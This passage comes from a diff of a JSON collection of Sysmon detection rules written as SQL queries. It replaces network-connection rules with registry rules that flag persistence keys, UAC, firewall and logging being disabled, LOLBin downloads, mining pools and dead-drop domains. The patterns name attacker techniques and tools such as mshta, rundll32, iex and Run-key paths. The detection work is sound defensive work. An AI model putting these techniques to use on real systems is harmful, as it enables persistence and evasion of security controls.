IMEWDBLD.exe (built-in to windows) to download a file", + "title": "Lolbas OneDriveStandaloneUpdater.exe Proxy Download", + "id": "3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d", + "status": "experimental", + "description": "Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\nanomalous executables with suspicious arguments. The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdaterreSignInSettingsConfig.json\n", "author": "frack113", "tags": [ "attack.command_and_control", "attack.t1105" ], - "falsepositives": [ - "Legitimate script" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND Image LIKE '%\\\\IMEWDBLD.exe' ESCAPE '\\')" - ], - "filename": "net_connection_win_imewdbld.yml" - }, - { - "title": "Cmstp Making Network Connection", - "id": "efafe0bf-4238-479e-af8f-797bd3490d2d", - "status": "experimental", - "description": "Detects suspicious network connection by Cmstp", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1218.003" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND Initiated = 'true')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\OneDrive\\\\UpdateOfficeConfig\\\\UpdateRingSettingURLFromOC%' ESCAPE '\\')" ], - "filename": "net_connection_win_susp_cmstp.yml" + "filename": "registry_set_lolbin_onedrivestandaloneupdater.yml" }, { - "title": "Msiexec Initiated Connection", - "id": "8e5e38e4-5350-4c0b-895a-e872ce0dd54f", - "status": "test", - "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", + "title": "Potential Registry Persistence Attempt Via DbgManagedDebugger", + "id": "9827ae57-3802-418f-994b-d5ecf5cd974b", + "status": "experimental", + "description": "Detects the addition of the \"Debugger\" value to the \"DbgManagedDebugger\" key in order to achieve persistence. Which will get invoked when an application crashes", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.007" + "attack.persistence", + "attack.t1574" ], "falsepositives": [ - "Legitimate msiexec over networks" + "Legitimate use of the key to setup a debugger. Which is often the case on developers machines" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND Image LIKE '%\\\\msiexec.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\.NETFramework\\\\DbgManagedDebugger' ESCAPE '\\') AND NOT (Details LIKE '\"C:\\\\Windows\\\\system32\\\\vsjitdebugger.exe\" PID \\%d APPDOM \\%d EXTEXT \"\\%s\" EVTHDL \\%d' ESCAPE '\\'))" ], - "filename": "net_connection_win_msiexec.yml" + "filename": "registry_set_dbgmanageddebugger_persistence.yml" }, { - "title": "Suspicious Dropbox API Usage", - "id": "25eabf56-22f0-4915-a1ed-056b8dae0a68", + "title": "Potential Persistence Via App Paths Default Property", + "id": "707e097c-e20f-4f67-8807-1f72ff4500d6", "status": "experimental", - "description": "Detects an executable that isn't dropbox but communicates with the Dropbox API", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to pre-pend information to the PATH environment variable on a per-application, per-process basis.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1546.012" + ], "falsepositives": [ - "Legitimate use of the API with a tool that the author wasn't aware of" + "Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (DestinationHostname LIKE '%api.dropboxapi.com' ESCAPE '\\' OR DestinationHostname LIKE '%content.dropboxapi.com' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\Dropbox%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\App Paths%' ESCAPE '\\' AND (TargetObject LIKE '%(Default)' ESCAPE '\\' OR TargetObject LIKE '%Path' ESCAPE '\\') AND (Details LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%%' ESCAPE '\\' OR Details LIKE '%iex%' ESCAPE '\\' OR Details LIKE '%Invoke-%' ESCAPE '\\' OR Details LIKE '%rundll32%' ESCAPE '\\' OR Details LIKE '%regsvr32%' ESCAPE '\\' OR Details LIKE '%mshta%' ESCAPE '\\' OR Details LIKE '%cscript%' ESCAPE '\\' OR Details LIKE '%wscript%' ESCAPE '\\' OR Details LIKE '%.bat%' ESCAPE '\\' OR Details LIKE '%.hta%' ESCAPE '\\' OR Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.ps1%' ESCAPE '\\'))" ], - "filename": "net_connection_win_susp_dropbox_api.yml" + "filename": "registry_set_persistence_app_paths.yml" }, { - "title": "RDP to HTTP or HTTPS Target Ports", - "id": "b1e5da3b-ca8e-4adf-915c-9921f3d85481", + "title": "Potential AutoLogger Sessions Tampering", + "id": "f37b4bce-49d0-4087-9f5b-58bffda77316", "status": "experimental", - "description": "Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389' AND DestinationPort IN ('80', '443'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\WMI\\\\Autologger\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\EventLog-%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Defender%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Enable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Start' ESCAPE '\\') AND Details = 'DWORD (0x00000000)') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\wevtutil.exe' ESCAPE '\\')))" ], - "filename": "net_connection_win_rdp_to_http.yml" + "filename": "registry_set_disable_autologger_sessions.yml" }, { - "title": "Microsoft Binary Github Communication", - "id": "635dbb88-67b3-4b41-9ea5-a3af2dd88153", + "title": "Registry Persistence via Explorer Run Key", + "id": "b7916c2a-fa2f-4795-9477-32b731f70f11", "status": "test", - "description": "Detects an executable in the Windows folder accessing github.com", - "author": "Michael Haag (idea), Florian Roth (Nextron Systems)", + "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1105", - "attack.exfiltration", - "attack.t1567.001" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown", - "@subTee in your network" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND (DestinationHostname LIKE '%.github.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\') AND Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run' ESCAPE '\\') AND ((Details LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\ProgramData\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Users\\\\Default\\\\%' ESCAPE '\\') OR Details LIKE '%\\\\AppData\\\\%' ESCAPE '\\'))" ], - "filename": "net_connection_win_binary_github_com.yml" + "filename": "registry_set_susp_reg_persist_explorer_run.yml" }, { - "title": "Microsoft Sync Center Suspicious Network Connections", - "id": "9f2cc74d-78af-4eb2-bb64-9cd1d292b87b", + "title": "Disable UAC Using Registry", + "id": "48437c39-9e5f-47fb-af95-3d663c3f2919", "status": "experimental", - "description": "Detects suspicious connections from Microsoft Sync Center to non-private IPs.", - "author": "elhoim", + "description": "Detects when an attacker tries to disable User Account Control (UAC) by changing its registry key HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA from 1 to 0", + "author": "frack113", "tags": [ - "attack.t1055", - "attack.t1218", - "attack.execution", - "attack.defense_evasion" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\mobsync.exe' ESCAPE '\\' AND NOT ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\') AND DestinationIsIpv6 = 'false'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLUA%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "net_connection_win_susp_outbound_mobsync_connection.yml" + "filename": "registry_set_disable_uac_registry.yml" }, { - "title": "Python Initiated Connection", - "id": "bef0bc5a-b9ae-425d-85c6-7b2d705980c6", + "title": "Office Security Settings Changed", + "id": "a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd", "status": "experimental", - "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", - "author": "frack113", + "description": "Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references)", + "author": "Trent Liffick (@tliffick)", "tags": [ - "attack.discovery", - "attack.t1046" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate python script" + "Valid Macros and/or internal documents" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND Image LIKE '%python%' ESCAPE '\\') AND NOT ((ParentImage LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\conda.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\conda-script.py%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\python.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\jupyter-notebook-script.py%' ESCAPE '\\') OR (DestinationIp = '127.0.0.1' AND SourceIp = '127.0.0.1')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Security\\\\Trusted Documents\\\\TrustRecords' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\AccessVBOM' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\VBAWarnings' ESCAPE '\\'))" ], - "filename": "net_connection_win_python.yml" + "filename": "registry_set_office_security.yml" }, { - "title": "Silenttrinity Stager Msbuild Activity", - "id": "50e54b8d-ad73-43f8-96a1-5191685b17a4", + "title": "Disable Microsoft Defender Firewall via Registry", + "id": "974515da-6cc5-4c95-ae65-f97f9150ec7f", "status": "test", - "description": "Detects a possible remote connections to Silenttrinity c2", - "author": "Kiran kumar s, oscd.community", + "description": "Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1127.001" + "attack.defense_evasion", + "attack.t1562.004" ], "falsepositives": [ "Unknown" ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' AND DestinationPort IN ('80', '443') AND Initiated = 'true')" - ], - "filename": "net_connection_win_silenttrinity_stager_msbuild_activity.yml" - }, - { - "title": "Windows Crypto Mining Pool Connections", - "id": "fa5b1358-b040-4403-9868-15f7d9ab6329", - "status": "stable", - "description": "Detects process connections to a Monero crypto mining pool", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.impact", - "attack.t1496" - ], - "falsepositives": [ - "Legitimate use of crypto miners" - ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND DestinationHostname IN ('pool.minexmr.com', 'fr.minexmr.com', 'de.minexmr.com', 'sg.minexmr.com', 'ca.minexmr.com', 'us-west.minexmr.com', 'pool.supportxmr.com', 'mine.c3pool.com', 'xmr-eu1.nanopool.org', 'xmr-eu2.nanopool.org', 'xmr-us-east1.nanopool.org', 'xmr-us-west1.nanopool.org', 'xmr-asia1.nanopool.org', 'xmr-jp1.nanopool.org', 'xmr-au1.nanopool.org', 'xmr.2miners.com', 'xmr.hashcity.org', 'xmr.f2pool.com', 'xmrpool.eu', 'pool.hashvault.pro', 'moneroocean.stream', 'monerocean.stream'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\SharedAccess\\\\Parameters\\\\FirewallPolicy\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\EnableFirewall' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "net_connection_win_crypto_mining.yml" + "filename": "registry_set_disable_defender_firewall.yml" }, { - "title": "Rundll32 Internet Connection", - "id": "cdc8da7d-c303-42f8-b08c-b4ab47230263", + "title": "Registry Explorer Policy Modification", + "id": "1c3121ed-041b-4d97-a075-07f54f20fb4a", "status": "test", - "description": "Detects a rundll32 that communicates with public IP addresses", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218.011", - "attack.execution" + "attack.t1112" ], "falsepositives": [ - "Communication to other corporate systems that use IP addresses from public address spaces" + "Legitimate admin script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND Initiated = 'true') AND NOT (((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp LIKE '20.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\') OR CommandLine LIKE '%PcaSvc.dll,PcaPatchSdbTask%' ESCAPE '\\' OR SourceHostname LIKE '%.internal.cloudapp.net' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND DestinationPort = '443')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoLogOff' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoDesktop' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoRun' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoFind' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoControlPanel' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoFileMenu' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoClose' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoSetTaskbar' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoPropertiesMyDocuments' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoTrayContextMenu' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" ], - "filename": "net_connection_win_rundll32_net_connections.yml" + "filename": "registry_set_set_nopolicies_user.yml" }, { - "title": "Suspicious Epmap Connection", - "id": "628d7a0b-7b84-4466-8552-e6138bc03b43", + "title": "Set TimeProviders DllName", + "id": "e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", "status": "experimental", - "description": "Detects suspicious \"epmap\" connection to a remote computer via remote procedure call (RPC)", - "author": "frack113, Tim Shelton (fps)", + "description": "Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProvider.\nAdversaries may abuse time providers to execute DLLs when the system boots.\nThe Windows Time service (W32Time) enables time synchronization across and within domains.\n", + "author": "frack113", "tags": [ - "attack.lateral_movement" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1547.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Protocol = 'tcp' AND Initiated = 'true' AND DestinationPort = '135') AND NOT ((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\ProgramData\\\\Amazon\\\\SSM\\\\Update\\\\amazon-ssm-agent-updater%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\W32Time\\\\TimeProviders%' ESCAPE '\\' AND TargetObject LIKE '%DllName' ESCAPE '\\') AND NOT (Details LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\w32time.DLL' ESCAPE '\\'))" ], - "filename": "net_connection_win_susp_epmap.yml" + "filename": "registry_set_timeproviders_dllname.yml" }, { - "title": "Dead Drop Resolvers", - "id": "297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", - "status": "test", - "description": "Detects an executable, which is not an internet browser, making DNS request to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.", - "author": "Sorina Ionescu", + "title": "Office Autorun Keys Modification", + "id": "baecf8fb-edbf-429f-9ade-31fc3f22b970", + "status": "experimental", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.command_and_control", - "attack.t1102", - "attack.t1102.001" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender." + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (DestinationHostname LIKE '%cdn.discordapp.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%youtube.com' ESCAPE '\\' OR DestinationHostname LIKE '%technet.microsoft.com' ESCAPE '\\' OR DestinationHostname LIKE '%facebook.com' ESCAPE '\\' OR DestinationHostname LIKE '%.cloudflare.com' ESCAPE '\\' OR DestinationHostname LIKE '%docs.google.com' ESCAPE '\\' OR DestinationHostname LIKE '%steamcommunity.com' ESCAPE '\\' OR DestinationHostname LIKE '%reddit.com' ESCAPE '\\' OR DestinationHostname LIKE '%fotolog.com' ESCAPE '\\' OR DestinationHostname LIKE '%twitter.com' ESCAPE '\\' OR DestinationHostname LIKE '%imgur.com' ESCAPE '\\' OR DestinationHostname LIKE '%feeds.rapidfeeds.com' ESCAPE '\\' OR DestinationHostname LIKE '%livejournal.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\')) AND NOT (((Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\edge.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\brave.exe' ESCAPE '\\' OR Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR Image LIKE '%\\\\whale.exe' ESCAPE '\\' OR Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\')) OR ((Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR Image LIKE '%\\\\MsSense.exe' ESCAPE '\\' OR Image LIKE '%\\\\PRTG Probe.exe' ESCAPE '\\' OR Image LIKE '%\\\\Engine.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Office%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Word\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PowerPoint\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Onenote\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Access\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%test\\\\Special\\\\Perf%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR ((Image LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\regsvr32.exe%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Excel\\\\Addins\\\\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\ExcelPlugInShell.PowerMapConnect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\NativeShim\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\NativeShim.InquireConnector.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\PowerPivotExcelClientAddIn.NativeEntry.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\AccessAddin.DC\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\ColleagueImport.ColleagueImportAddin\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\EvernoteCC.EvernoteContactConnector\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\EvernoteOLRD.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\Microsoft.VbaAddinForOutlook.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OcOffice.OcForms\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OneNote.OutlookAddin%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OscAddin.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OutlookChangeNotifier.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UCAddin.LyncAddin.1%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UCAddin.UCAddin.1%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UmOutlookAddin.FormRegionAddin\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND 